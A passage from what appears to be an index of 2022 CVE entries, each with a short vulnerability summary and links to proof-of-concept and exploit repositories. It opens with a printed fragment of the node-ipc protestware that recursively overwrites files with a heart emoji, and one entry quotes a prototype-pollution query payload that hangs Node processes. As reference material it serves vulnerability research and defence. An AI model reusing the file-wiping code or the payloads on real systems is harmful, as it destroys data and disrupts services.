catch (t) {} const f = []; const c = Buffer.from("4p2k77iP", "base64"); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with ❤️ } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl };
- [scriptzteam/node-ipc-malware-protestware-CVE-2022-23812](https://github.com/scriptzteam/node-ipc-malware-protestware-CVE-2022-23812)
### CVE-2022-23852 (2022-01-24)
Expat (aka libexpat) before 2.4.4 has a signed integer overflow in XML_GetBuffer, for configurations with a nonzero XML_CONTEXT_BYTES.
- [Satheesh575555/external_expat_AOSP10_r33_CVE-2022-23852](https://github.com/Satheesh575555/external_expat_AOSP10_r33_CVE-2022-23852)
### CVE-2022-23861
- [mbadanoiu/CVE-2022-23861](https://github.com/mbadanoiu/CVE-2022-23861)
### CVE-2022-23862
- [mbadanoiu/CVE-2022-23862](https://github.com/mbadanoiu/CVE-2022-23862)
### CVE-2022-23884 (2022-03-28)
Mojang Bedrock Dedicated Server 1.18.2 is affected by an integer overflow leading to a bound check bypass caused by PurchaseReceiptPacket::_read (packet deserializer).
- [nanaao/CVE-2022-23884](https://github.com/nanaao/CVE-2022-23884)
### CVE-2022-23909 (2022-04-05)
There is an unquoted service path in Sherpa Connector Service (SherpaConnectorService.exe) 2020.2.20328.2050. This might allow a local user to escalate privileges by creating a "C:\Program Files\Sherpa Software\Sherpa.exe" file.
- [netsectuna/CVE-2022-23909](https://github.com/netsectuna/CVE-2022-23909)
### CVE-2022-23935 (2022-01-25)
lib/Image/ExifTool.pm in ExifTool before 12.38 mishandles a $file =~ /\|$/ check, leading to command injection.
- [dpbe32/CVE-2022-23935-PoC-Exploit](https://github.com/dpbe32/CVE-2022-23935-PoC-Exploit)
- [cowsecurity/CVE-2022-23935](https://github.com/cowsecurity/CVE-2022-23935)
- [BKreisel/CVE-2022-23935](https://github.com/BKreisel/CVE-2022-23935)
### CVE-2022-23940 (2022-03-07)
SuiteCRM through 7.12.1 and 8.x through 8.0.1 allows Remote Code Execution. Authenticated users with access to the Scheduled Reports module can achieve this by leveraging PHP deserialization in the email_recipients property. By using a crafted request, they can create a malicious report, containing a PHP-deserialization payload in the email_recipients field. Once someone accesses this report, the backend will deserialize the content of the email_recipients field and the payload gets executed. Project dependencies include a number of interesting PHP deserialization gadgets (e.g., Monolog/RCE1 from phpggc) that can be used for Code Execution.
- [manuelz120/CVE-2022-23940](https://github.com/manuelz120/CVE-2022-23940)
### CVE-2022-23967
- [MaherAzzouzi/CVE-2022-23967](https://github.com/MaherAzzouzi/CVE-2022-23967)
### CVE-2022-23988 (2022-02-28)
The WS Form LITE and Pro WordPress plugins before 1.8.176 do not sanitise and escape submitted form data, allowing unauthenticated attacker to submit XSS payloads which will get executed when a privileged user will view the related submission
- [simonepetruzzi/WebSecurityProject](https://github.com/simonepetruzzi/WebSecurityProject)
### CVE-2022-23990 (2022-01-26)
Expat (aka libexpat) before 2.4.4 has an integer overflow in the doProlog function.
- [Satheesh575555/external_expat_AOSP10_r33_CVE-2022-23990](https://github.com/Satheesh575555/external_expat_AOSP10_r33_CVE-2022-23990)
### CVE-2022-24086 (2022-02-16)
Adobe Commerce versions 2.4.3-p1 (and earlier) and 2.3.7-p2 (and earlier) are affected by an improper input validation vulnerability during the checkout process. Exploitation of this issue does not require user interaction and could result in arbitrary code execution.
- [Mr-xn/CVE-2022-24086](https://github.com/Mr-xn/CVE-2022-24086)
- [nanaao/CVE-2022-24086-RCE](https://github.com/nanaao/CVE-2022-24086-RCE)
- [NHPT/CVE-2022-24086-RCE](https://github.com/NHPT/CVE-2022-24086-RCE)
- [oK0mo/CVE-2022-24086-RCE-PoC](https://github.com/oK0mo/CVE-2022-24086-RCE-PoC)
- [seymanurmutlu/CVE-2022-24086-CVE-2022-24087](https://github.com/seymanurmutlu/CVE-2022-24086-CVE-2022-24087)
- [akr3ch/CVE-2022-24086](https://github.com/akr3ch/CVE-2022-24086)
- [pescepilota/CVE-2022-24086](https://github.com/pescepilota/CVE-2022-24086)
- [BurpRoot/CVE-2022-24086](https://github.com/BurpRoot/CVE-2022-24086)
### CVE-2022-24087
- [Neimar47574/CVE-2022-24087](https://github.com/Neimar47574/CVE-2022-24087)
### CVE-2022-24112 (2022-02-11)
An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.
- [Mr-xn/CVE-2022-24112](https://github.com/Mr-xn/CVE-2022-24112)
- [CrackerCat/CVE-2022-24112](https://github.com/CrackerCat/CVE-2022-24112)
- [Axx8/CVE-2022-24112](https://github.com/Axx8/CVE-2022-24112)
- [Mah1ndra/CVE-2022-24112](https://github.com/Mah1ndra/CVE-2022-24112)
- [M4xSec/Apache-APISIX-CVE-2022-24112](https://github.com/M4xSec/Apache-APISIX-CVE-2022-24112)
- [kavishkagihan/CVE-2022-24112-POC](https://github.com/kavishkagihan/CVE-2022-24112-POC)
- [twseptian/cve-2022-24112](https://github.com/twseptian/cve-2022-24112)
- [Acczdy/CVE-2022-24112_POC](https://github.com/Acczdy/CVE-2022-24112_POC)
- [wshepherd0010/CVE-2022-24112-Lab](https://github.com/wshepherd0010/CVE-2022-24112-Lab)
- [btar1gan/exploit_CVE-2022-24112](https://github.com/btar1gan/exploit_CVE-2022-24112)
### CVE-2022-24122 (2022-01-29)
kernel/ucount.c in the Linux kernel 5.14 through 5.16.4, when unprivileged user namespaces are enabled, allows a use-after-free and privilege escalation because a ucounts object can outlive its namespace.
- [meowmeowxw/CVE-2022-24122](https://github.com/meowmeowxw/CVE-2022-24122)
### CVE-2022-24124 (2022-01-29)
The query API in Casdoor before 1.13.1 has a SQL injection vulnerability related to the field and value parameters, as demonstrated by api/get-organizations.
- [ColdFusionX/CVE-2022-24124](https://github.com/ColdFusionX/CVE-2022-24124)
- [0xAbbarhSF/CVE-2022-24124](https://github.com/0xAbbarhSF/CVE-2022-24124)
- [b1gdog/CVE-2022-24124](https://github.com/b1gdog/CVE-2022-24124)
### CVE-2022-24125 (2022-03-20)
The matchmaking servers of Bandai Namco FromSoftware Dark Souls III through 2022-03-19 allow remote attackers to send arbitrary push requests to clients via a RequestSendMessageToPlayers request. For example, ability to send a push message to hundreds of thousands of machines is only restricted on the client side, and can thus be bypassed with a modified client.
- [tremwil/ds3-nrssr-rce](https://github.com/tremwil/ds3-nrssr-rce)
### CVE-2022-24181 (2022-04-01)
Cross-site scripting (XSS) via Host Header injection in PKP Open Journals System 2.4.8 >= 3.3 allows remote attackers to inject arbitary code via the X-Forwarded-Host Header.
- [cyberhawk000/CVE-2022-24181](https://github.com/cyberhawk000/CVE-2022-24181)
### CVE-2022-24227 (2022-02-15)
A cross-site scripting (XSS) vulnerability in BoltWire v7.10 and v 8.00 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the name and lastname parameters.
- [Cyber-Wo0dy/CVE-2022-24227-updated](https://github.com/Cyber-Wo0dy/CVE-2022-24227-updated)
### CVE-2022-24342 (2022-02-25)
In JetBrains TeamCity before 2021.2.1, URL injection leading to CSRF was possible.
- [yuriisanin/CVE-2022-24342](https://github.com/yuriisanin/CVE-2022-24342)
### CVE-2022-24348 (2022-02-04)
Argo CD before 2.1.9 and 2.2.x before 2.2.4 allows directory traversal related to Helm charts because of an error in helmTemplate in repository.go. For example, an attacker may be able to discover credentials stored in a YAML file.
- [jkroepke/CVE-2022-24348-2](https://github.com/jkroepke/CVE-2022-24348-2)
### CVE-2022-24439 (2022-12-12)
All versions of package gitpython are vulnerable to Remote Code Execution (RCE) due to improper user input validation, which makes it possible to inject a maliciously crafted remote URL into the clone command. Exploiting this vulnerability is possible because the library makes external calls to git without sufficient sanitization of input arguments.
- [muhammadhendro/CVE-2022-24439](https://github.com/muhammadhendro/CVE-2022-24439)
### CVE-2022-24442 (2022-02-25)
JetBrains YouTrack before 2021.4.40426 was vulnerable to SSTI (Server-Side Template Injection) via FreeMarker templates.
- [mbadanoiu/CVE-2022-24442](https://github.com/mbadanoiu/CVE-2022-24442)
### CVE-2022-24449 (2022-04-28)
Solar appScreener through 3.10.4, when a valid license is not present, allows XXE and SSRF attacks via a crafted XML document.
- [jet-pentest/CVE-2022-24449](https://github.com/jet-pentest/CVE-2022-24449)
### CVE-2022-24481 (2022-04-15)
Windows Common Log File System Driver Elevation of Privilege Vulnerability
- [fr4nkxixi/CVE-2022-24481-POC](https://github.com/fr4nkxixi/CVE-2022-24481-POC)
### CVE-2022-24483 (2022-04-15)
Windows Kernel Information Disclosure Vulnerability
- [waleedassar/CVE-2022-24483](https://github.com/waleedassar/CVE-2022-24483)
### CVE-2022-24491 (2022-04-15)
Windows Network File System Remote Code Execution Vulnerability
- [corelight/CVE-2022-24491](https://github.com/corelight/CVE-2022-24491)
### CVE-2022-24494 (2022-04-15)
Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability
- [vportal/AFD](https://github.com/vportal/AFD)
### CVE-2022-24497 (2022-04-15)
Windows Network File System Remote Code Execution Vulnerability
- [corelight/CVE-2022-24497](https://github.com/corelight/CVE-2022-24497)
### CVE-2022-24500 (2022-04-15)
Windows SMB Remote Code Execution Vulnerability
- [0xZipp0/CVE-2022-24500](https://github.com/0xZipp0/CVE-2022-24500)
### CVE-2022-24611 (2022-05-17)
Denial of Service (DoS) in the Z-Wave S0 NonceGet protocol specification in Silicon Labs Z-Wave 500 series allows local attackers to block S0/S2 protected Z-Wave network via crafted S0 NonceGet Z-Wave packages, utilizing included but absent NodeIDs.
- [ITSecLab-HSEL/CVE-2022-24611](https://github.com/ITSecLab-HSEL/CVE-2022-24611)
### CVE-2022-24637 (2022-03-18)
Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. This occurs because files generated with '<?php (instead of the intended "<?php sequence) aren't handled by the PHP interpreter.
- [JacobEbben/CVE-2022-24637](https://github.com/JacobEbben/CVE-2022-24637)
- [Lay0us/CVE-2022-24637](https://github.com/Lay0us/CVE-2022-24637)
- [hupe1980/CVE-2022-24637](https://github.com/hupe1980/CVE-2022-24637)
- [icebreack/CVE-2022-24637](https://github.com/icebreack/CVE-2022-24637)
- [Pflegusch/CVE-2022-24637](https://github.com/Pflegusch/CVE-2022-24637)
- [0xM4hm0ud/CVE-2022-24637](https://github.com/0xM4hm0ud/CVE-2022-24637)
- [0xRyuk/CVE-2022-24637](https://github.com/0xRyuk/CVE-2022-24637)
### CVE-2022-24644 (2022-03-07)
ZZ Inc. KeyMouse Windows 3.08 and prior is affected by a remote code execution vulnerability during an unauthenticated update. To exploit this vulnerability, a user must trigger an update of an affected installation of KeyMouse.
- [gerr-re/cve-2022-24644](https://github.com/gerr-re/cve-2022-24644)
- [ThanhThuy2908/ATHDH_CVE_2022_24644](https://github.com/ThanhThuy2908/ATHDH_CVE_2022_24644)
### CVE-2022-24654 (2022-08-15)
Authenticated stored cross-site scripting (XSS) vulnerability in "Field Server Address" field in INTELBRAS ATA 200 Firmware 74.19.10.21 allows attackers to inject JavaScript code through a crafted payload.
- [leonardobg/CVE-2022-24654](https://github.com/leonardobg/CVE-2022-24654)
### CVE-2022-24675 (2022-04-20)
encoding/pem in Go before 1.17.9 and 1.18.x before 1.18.1 has a Decode stack overflow via a large amount of PEM data.
- [jfrog/jfrog-CVE-2022-24675](https://github.com/jfrog/jfrog-CVE-2022-24675)
### CVE-2022-24693 (2022-03-30)
Baicells Nova436Q and Neutrino 430 devices with firmware through QRTB 2.7.8 have hardcoded credentials that are easily discovered, and can be used by remote attackers to authenticate via ssh. (The credentials are stored in the firmware, encrypted by the crypt function.)
- [lukejenkins/CVE-2022-24693](https://github.com/lukejenkins/CVE-2022-24693)
### CVE-2022-24702 (2022-05-31)
An issue was discovered in WinAPRS 2.9.0. A buffer overflow in the VHF KISS TNC component allows a remote attacker to achieve remote code execution via malicious AX.25 packets over the air. NOTE: This vulnerability only affects products that are no longer supported by the maintainer
- [Coalfire-Research/WinAPRS-Exploits](https://github.com/Coalfire-Research/WinAPRS-Exploits)
### CVE-2022-24706 (2022-04-26)
In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges. The CouchDB documentation has always made recommendations for properly securing an installation, including recommending using a firewall in front of all CouchDB installations.
- [sadshade/CVE-2022-24706-CouchDB-Exploit](https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit)
- [ahmetsabrimert/Apache-CouchDB-CVE-2022-24706-RCE-Exploits-Blog-post-](https://github.com/ahmetsabrimert/Apache-CouchDB-CVE-2022-24706-RCE-Exploits-Blog-post-)
- [superzerosec/CVE-2022-24706](https://github.com/superzerosec/CVE-2022-24706)
### CVE-2022-24707 (2022-02-23)
Anuko Time Tracker is an open source, web-based time tracking application written in PHP. UNION SQL injection and time-based blind injection vulnerabilities existed in Time Tracker Puncher plugin in versions of anuko timetracker prior to 1.20.0.5642. This was happening because the Puncher plugin was reusing code from other places and was relying on an unsanitized date parameter in POST requests. Because the parameter was not checked, it was possible to craft POST requests with malicious SQL for Time Tracker database. This issue has been resolved in in version 1.20.0.5642. Users unable to upgrade are advised to add their own checks to input.
- [Altelus1/CVE-2022-24707](https://github.com/Altelus1/CVE-2022-24707)
### CVE-2022-24713 (2022-03-08)
regex is an implementation of regular expressions for the Rust language. The regex crate features built-in mitigations to prevent denial of service attacks caused by untrusted regexes, or untrusted input matched by trusted regexes. Those (tunable) mitigations already provide sane defaults to prevent attacks. This guarantee is documented and it's considered part of the crate's API. Unfortunately a bug was discovered in the mitigations designed to prevent untrusted regexes to take an arbitrary amount of time during parsing, and it's possible to craft regexes that bypass such mitigations. This makes it possible to perform denial of service attacks by sending specially crafted regexes to services accepting user-controlled, untrusted regexes. All versions of the regex crate before or equal to 1.5.4 are affected by this issue. The fix is include starting from regex 1.5.5. All users accepting user-controlled regexes are recommended to upgrade immediately to the latest version of the regex crate. Unfortunately there is no fixed set of problematic regexes, as there are practically infinite regexes that could be crafted to exploit this vulnerability. Because of this, it us not recommend to deny known problematic regexes.
- [ItzSwirlz/CVE-2022-24713-POC](https://github.com/ItzSwirlz/CVE-2022-24713-POC)
### CVE-2022-24715 (2022-03-08)
Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Authenticated users, with access to the configuration, can create SSH resource files in unintended directories, leading to the execution of arbitrary code. This issue has been resolved in versions 2.8.6, 2.9.6 and 2.10 of Icinga Web 2. Users unable to upgrade should limit access to the Icinga Web 2 configuration.
- [JacobEbben/CVE-2022-24715](https://github.com/JacobEbben/CVE-2022-24715)
- [cxdxnt/CVE-2022-24715](https://github.com/cxdxnt/CVE-2022-24715)
- [d4rkb0n3/CVE-2022-24715-go](https://github.com/d4rkb0n3/CVE-2022-24715-go)
### CVE-2022-24716 (2022-03-08)
Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Unauthenticated users can leak the contents of files of the local system accessible to the web-server user, including `icingaweb2` configuration files with database credentials. This issue has been resolved in versions 2.9.6 and 2.10 of Icinga Web 2. Database credentials should be rotated.
- [JacobEbben/CVE-2022-24716](https://github.com/JacobEbben/CVE-2022-24716)
- [joaoviictorti/CVE-2022-24716](https://github.com/joaoviictorti/CVE-2022-24716)
- [pumpkinpiteam/CVE-2022-24716](https://github.com/pumpkinpiteam/CVE-2022-24716)
- [doosec101/CVE-2022-24716](https://github.com/doosec101/CVE-2022-24716)
- [antisecc/CVE-2022-24716](https://github.com/antisecc/CVE-2022-24716)
### CVE-2022-24734 (2022-03-09)
MyBB is a free and open source forum software. In affected versions the Admin CP's Settings management module does not validate setting types correctly on insertion and update, making it possible to add settings of supported type `php` with PHP code, executed on on _Change Settings_ pages. This results in a Remote Code Execution (RCE) vulnerability. The vulnerable module requires Admin CP access with the `Can manage settings?` permission. MyBB's Settings module, which allows administrators to add, edit, and delete non-default settings, stores setting data in an options code string ($options_code; mybb_settings.optionscode database column) that identifies the setting type and its options, separated by a new line character (\n). In MyBB 1.2.0, support for setting type php was added, for which the remaining part of the options code is PHP code executed on Change Settings pages (reserved for plugins and internal use). MyBB 1.8.30 resolves this issue. There are no known workarounds.
- [Altelus1/CVE-2022-24734](https://github.com/Altelus1/CVE-2022-24734)
- [lavclash75/mybb-CVE-2022-24734](https://github.com/lavclash75/mybb-CVE-2022-24734)
### CVE-2022-24760 (2022-03-11)
Parse Server is an open source http web server backend. In versions prior to 4.10.7 there is a Remote Code Execution (RCE) vulnerability in Parse Server. This vulnerability affects Parse Server in the default configuration with MongoDB. The main weakness that leads to RCE is the Prototype Pollution vulnerable code in the file `DatabaseController.js`, so it is likely to affect Postgres and any other database backend as well. This vulnerability has been confirmed on Linux (Ubuntu) and Windows. Users are advised to upgrade as soon as possible. The only known workaround is to manually patch your installation with code referenced at the source GHSA-p6h4-93qp-jhcm.
- [tuo4n8/CVE-2022-24760](https://github.com/tuo4n8/CVE-2022-24760)
### CVE-2022-24780 (2022-04-05)
Combodo iTop is a web based IT Service Management tool. In versions prior to 2.7.6 and 3.0.0, users of the iTop user portal can send TWIG code to the server by forging specific http queries, and execute arbitrary code on the server using http server user privileges. This issue is fixed in versions 2.7.6 and 3.0.0. There are currently no known workarounds.
- [Acceis/exploit-CVE-2022-24780](https://github.com/Acceis/exploit-CVE-2022-24780)
### CVE-2022-24818 (2022-04-13)
GeoTools is an open source Java library that provides tools for geospatial data. The GeoTools library has a number of data sources that can perform unchecked JNDI lookups, which in turn can be used to perform class deserialization and result in arbitrary code execution. Similar to the Log4J case, the vulnerability can be triggered if the JNDI names are user-provided, but requires admin-level login to be triggered. The lookups are now restricted in GeoTools 26.4, GeoTools 25.6, and GeoTools 24.6. Users unable to upgrade should ensure that any downstream application should not allow usage of remotely provided JNDI strings.
- [mbadanoiu/CVE-2022-24818](https://github.com/mbadanoiu/CVE-2022-24818)
### CVE-2022-24834 (2023-07-13)
Redis is an in-memory database that persists on disk. A specially crafted Lua script executing in Redis can trigger a heap overflow in the cjson library, and result with heap corruption and potentially remote code execution. The problem exists in all versions of Redis with Lua scripting support, starting from 2.6, and affects only authenticated and authorized users. The problem is fixed in versions 7.0.12, 6.2.13, and 6.0.20.
- [convisolabs/CVE-2022-24834](https://github.com/convisolabs/CVE-2022-24834)
- [DukeSec97/CVE-2022-24834-](https://github.com/DukeSec97/CVE-2022-24834-)
### CVE-2022-24853 (2022-04-14)
Metabase is an open source business intelligence and analytics application. Metabase has a proxy to load arbitrary URLs for JSON maps as part of our GeoJSON support. While we do validation to not return contents of arbitrary URLs, there is a case where a particularly crafted request could result in file access on windows, which allows enabling an `NTLM relay attack`, potentially allowing an attacker to receive the system password hash. If you use Windows and are on this version of Metabase, please upgrade immediately. The following patches (or greater versions) are available: 0.42.4 and 1.42.4, 0.41.7 and 1.41.7, 0.40.8 and 1.40.8.
- [secure-77/CVE-2022-24853](https://github.com/secure-77/CVE-2022-24853)
### CVE-2022-24924 (2022-02-11)
An improper access control in LiveWallpaperService prior to versions 3.0.9.0 allows to create a specific named system directory without a proper permission.
- [heegong/CVE-2022-24924](https://github.com/heegong/CVE-2022-24924)
### CVE-2022-24934 (2022-03-23)
wpsupdater.exe in Kingsoft WPS Office through 11.2.0.10382 allows remote code execution by modifying HKEY_CURRENT_USER in the registry.
- [nanaao/CVE-2022-24934](https://github.com/nanaao/CVE-2022-24934)
- [ASkyeye/WPS-CVE-2022-24934](https://github.com/ASkyeye/WPS-CVE-2022-24934)
- [webraybtl/CVE-2022-24934](https://github.com/webraybtl/CVE-2022-24934)
- [MagicPiperSec/WPS-CVE-2022-24934](https://github.com/MagicPiperSec/WPS-CVE-2022-24934)
### CVE-2022-24990 (2023-02-07)
TerraMaster NAS 4.2.29 and earlier allows remote attackers to discover the administrative password by sending "User-Agent: TNAS" to module/api.php?mobile/webNasIPS and then reading the PWD field in the response.
- [Jaky5155/CVE-2022-24990-TerraMaster-TOS--PHP-](https://github.com/Jaky5155/CVE-2022-24990-TerraMaster-TOS--PHP-)
- [VVeakee/CVE-2022-24990-POC](https://github.com/VVeakee/CVE-2022-24990-POC)
- [0xf4n9x/CVE-2022-24990](https://github.com/0xf4n9x/CVE-2022-24990)
- [lishang520/CVE-2022-24990](https://github.com/lishang520/CVE-2022-24990)
- [ZZ-SOCMAP/CVE-2022-24990](https://github.com/ZZ-SOCMAP/CVE-2022-24990)
- [jsongmax/terraMaster-CVE-2022-24990](https://github.com/jsongmax/terraMaster-CVE-2022-24990)
### CVE-2022-24992 (2022-07-25)
A vulnerability in the component process.php of QR Code Generator v5.2.7 allows attackers to perform directory traversal.
- [n0lsecurity/CVE-2022-24992](https://github.com/n0lsecurity/CVE-2022-24992)
### CVE-2022-24999 (2022-11-26)
qs before 6.10.3, as used in Express before 4.17.3 and other products, allows attackers to cause a Node process hang for an Express application because an __ proto__ key can be used. In many typical Express use cases, an unauthenticated remote attacker can place the attack payload in the query string of the URL that is used to visit the application, such as a[__proto__]=b&a[__proto__]&a[length]=100000000. The fix was backported to qs 6.9.7, 6.8.3, 6.7.3, 6.6.1, 6.5.3, 6.4.1, 6.3.3, and 6.2.4 (and therefore Express 4.17.3, which has "deps: [email protected]" in its release description, is not vulnerable).
- [n8tz/CVE-2022-24999](https://github.com/n8tz/CVE-2022-24999)
### CVE-2022-25012 (2022-03-01)
Argus Surveillance DVR v4.0 employs weak password encryption.
- [s3l33/CVE-2022-25012](https://github.com/s3l33/CVE-2022-25012)
### CVE-2022-25018 (2022-03-01)
Pluxml v5.8.7 was discovered to allow attackers to execute arbitrary code via crafted PHP code inserted into static pages.
- [MoritzHuppert/CVE-2022-25018](https://github.com/MoritzHuppert/CVE-2022-25018)
### CVE-2022-25020 (2022-03-01)
A cross-site scripting (XSS) vulnerability in Pluxml v5.8.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the thumbnail path of a blog post.
- [MoritzHuppert/CVE-2022-25020](https://github.com/MoritzHuppert/CVE-2022-25020)
### CVE-2022-25022 (2022-03-01)
A cross-site scripting (XSS) vulnerability in Htmly v2.8.1 allows attackers to excute arbitrary web scripts HTML via a crafted payload in the content field of a blog post.
- [MoritzHuppert/CVE-2022-25022](https://github.com/MoritzHuppert/CVE-2022-25022)
### CVE-2022-25060 (2022-02-25)
TP-LINK TL-WR840N(ES)_V6.20_180709 was discovered to contain a command injection vulnerability via the component oal_startPing.
- [exploitwritter/CVE-2022-25060](https://github.com/exploitwritter/CVE-2022-25060)
### CVE-2022-25061 (2022-02-25)
TP-LINK TL-WR840N(ES)_V6.20_180709 was discovered to contain a command injection vulnerability via the component oal_setIp6DefaultRoute.
- [exploitwritter/CVE-2022-25061](https://github.com/exploitwritter/CVE-2022-25061)
### CVE-2022-25062 (2022-02-25)
TP-LINK TL-WR840N(ES)_V6.20_180709 was discovered to contain an integer overflow via the function dm_checkString. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request.
- [exploitwritter/CVE-2022-25062](https://github.com/exploitwritter/CVE-2022-25062)
### CVE-2022-25063
- [exploitwritter/CVE-2022-25063](https://github.com/exploitwritter/CVE-2022-25063)
### CVE-2022-25064 (2022-02-25)
TP-LINK TL-WR840N(ES)_V6.20_180709 was discovered to contain a remote code execution (RCE) vulnerability via the function oal_wan6_setIpAddr.
- [exploitwritter/CVE-2022-25064](https://github.com/exploitwritter/CVE-2022-25064)
- [Mr-xn/CVE-2022-25064](https://github.com/Mr-xn/CVE-2022-25064)
### CVE-2022-25089 (2022-03-02)
Printix Secure Cloud Print Management through 1.3.1106.0 incorrectly uses Privileged APIs to modify values in HKEY_LOCAL_MACHINE via UITasks.PersistentRegistryData.
- [ComparedArray/printix-CVE-2022-25089](https://github.com/ComparedArray/printix-CVE-2022-25089)
### CVE-2022-25090 (2022-03-09)
Printix Secure Cloud Print Management through 1.3.1106.0 creates a temporary temp.ini file in a directory with insecure permissions, leading to privilege escalation because of a race condition.
- [ComparedArray/printix-CVE-2022-25090](https://github.com/ComparedArray/printix-CVE-2022-25090)
### CVE-2022-25235 (2022-02-16)
xmltok_impl.c in Expat (aka libexpat) before 2.4.5 lacks certain validation of encoding, such as checks for whether a UTF-8 character is valid in a certain context.
- [Satheesh575555/external_expat_AOSP10_r33_CVE-2022-25235](https://github.com/Satheesh575555/external_expat_AOSP10_r33_CVE-2022-25235)
### CVE-2022-25236 (2022-02-16)
xmlparse.c in Expat (aka libexpat) before 2.4.5 allows attackers to insert namespace-separator characters into namespace URIs.
- [Satheesh575555/external_expat_AOSP10_r33_CVE-2022-25236](https://github.com/Satheesh575555/external_expat_AOSP10_r33_CVE-2022-25236)
### CVE-2022-25256 (2022-02-19)
SAS Web Report Studio 4.4 allows XSS. /SASWebReportStudio/logonAndRender.do has two parameters: saspfs_request_backlabel_list and saspfs_request_backurl_list. The first one affects the content of the button placed in the top left. The second affects the page to which the user is directed after pressing the button, e.g., a malicious web page. In addition, the second parameter executes JavaScript, which means XSS is possible by adding a javascript: URL.
- [RobertDra/CVE-2022-25256](https://github.com/RobertDra/CVE-2022-25256)
### CVE-2022-25257
- [polling-repo-continua/CVE-2022-25257](https://github.com/polling-repo-continua/CVE-2022-25257)
- [RobertDra/CVE-2022-25257](https://github.com/RobertDra/CVE-2022-25257)
### CVE-2022-25258 (2022-02-16)
An issue was discovered in drivers/usb/gadget/composite.c in the Linux kernel before 5.16.10. The USB Gadget subsystem lacks certain validation of interface OS descriptor requests (ones with a large array index and ones associated with NULL function pointer retrieval). Memory corruption might occur.
- [szymonh/d-os-descriptor](https://github.com/szymonh/d-os-descriptor)
### CVE-2022-25260 (2022-02-25)
JetBrains Hub before 2021.1.14276 was vulnerable to blind Server-Side Request Forgery (SSRF).
- [yuriisanin/CVE-2022-25260](https://github.com/yuriisanin/CVE-2022-25260)
### CVE-2022-25262 (2022-02-25)
In JetBrains Hub before 2022.1.14434, SAML request takeover was possible.
- [yuriisanin/CVE-2022-25262](https://github.com/yuriisanin/CVE-2022-25262)
### CVE-2022-25265 (2022-02-16)
In the Linux kernel through 5.16.10, certain binary files may have the exec-all attribute if they were built in approximately 2003 (e.g., with GCC 3.2.2 and Linux kernel 2.4.20). This can cause execution of bytes located in supposedly non-executable regions of a file.
- [x0reaxeax/exec-prot-bypass](https://github.com/x0reaxeax/exec-prot-bypass)
### CVE-2022-25313 (2022-02-18)
In Expat (aka libexpat) before 2.4.5, an attacker can trigger stack exhaustion in build_model via a large nesting depth in the DTD element.
- [ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25313](https://github.com/ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25313)
- [Trinadh465/external_expat-2.1.0_CVE-2022-25313](https://github.com/Trinadh465/external_expat-2.1.0_CVE-2022-25313)
### CVE-2022-25314 (2022-02-18)
In Expat (aka libexpat) before 2.4.5, there is an integer overflow in copyString.
- [ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25314](https://github.com/ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25314)
### CVE-2022-25315 (2022-02-18)
In Expat (aka libexpat) before 2.4.5, there is an integer overflow in storeRawNames.
- [ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25315](https://github.com/ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25315)
- [hshivhare67/external_expat_v2.1.0_CVE-2022-25315](https://github.com/hshivhare67/external_expat_v2.1.0_CVE-2022-25315)
### CVE-2022-25365 (2022-02-19)
Docker Desktop before 4.5.1 on Windows allows attackers to move arbitrary files. NOTE: this issue exists because of an incomplete fix for CVE-2022-23774.
- [followboy1999/CVE-2022-25365](https://github.com/followboy1999/CVE-2022-25365)
### CVE-2022-25375 (2022-02-20)
An issue was discovered in drivers/usb/gadget/function/rndis.c in the Linux kernel before 5.16.10. The RNDIS USB gadget lacks validation of the size of the RNDIS_MSG_SET command. Attackers can obtain sensitive information from kernel memory.
- [szymonh/rndis-co](https://github.com/szymonh/rndis-co)
### CVE-2022-25479 (2024-07-02)
Vulnerability in Realtek RtsPer driver for PCIe Card Reader (RtsPer.sys) before 10.0.22000.21355 and Realtek RtsUer driver for USB Card Reader (RtsUer.sys) before 10.0.22000.31274 allows for the leakage of kernel memory from both the stack and the heap.
- [SpiralBL0CK/CVE-2024-40431-CVE-2022-25479-EOP-CHAIN](https://github.com/SpiralBL0CK/CVE-2024-40431-CVE-2022-25479-EOP-CHAIN)
### CVE-2022-25636 (2022-02-22)
net/netfilter/nf_dup_netdev.c in the Linux kernel 5.4 through 5.6.10 allows local users to gain privileges because of a heap out-of-bounds write. This is related to nf_tables_offload.
- [Bonfee/CVE-2022-25636](https://github.com/Bonfee/CVE-2022-25636)
- [chenaotian/CVE-2022-25636](https://github.com/chenaotian/CVE-2022-25636)
- [veritas501/CVE-2022-25636-PipeVersion](https://github.com/veritas501/CVE-2022-25636-PipeVersion)
### CVE-2022-25640 (2022-02-24)
In wolfSSL before 5.2.0, a TLS 1.3 server cannot properly enforce a requirement for mutual authentication. A client can simply omit the certificate_verify message from the handshake, and never present a certificate.
- [dim0x69/cve-2022-25640-exploit](https://github.com/dim0x69/cve-2022-25640-exploit)
### CVE-2022-25765 (2022-09-09)
The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized.
